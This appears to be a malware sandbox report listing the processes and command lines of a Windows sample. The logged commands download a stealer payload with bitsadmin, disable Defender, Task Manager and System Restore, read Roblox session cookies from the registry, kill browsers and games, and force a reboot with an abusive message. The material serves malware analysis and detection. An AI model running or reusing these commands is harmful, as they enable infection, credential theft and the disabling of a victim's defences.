PID 4344 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4344 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4344 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 4344 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 4344 wrote to memory of 4492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4344 wrote to memory of 4492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4344 wrote to memory of 3328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4344 wrote to memory of 3328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4344 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4344 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4344 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4344 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4348 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4344 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 3760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 3760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4344 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4348 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 4348 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 4348 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4348 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 4348 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 916 wrote to memory of 4584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 916 wrote to memory of 4584 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4344 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4344 wrote to memory of 2336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4344 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 2064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4344 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4344 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4344 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4344 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\test.exe

"C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14329.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21446.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19074.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004CC

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM GenshinImpact.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26117.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19267.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26847.vbs"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2561.vbs" 19628.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19628.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\System32\PickerHost.exe

C:\Windows\System32\PickerHost.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

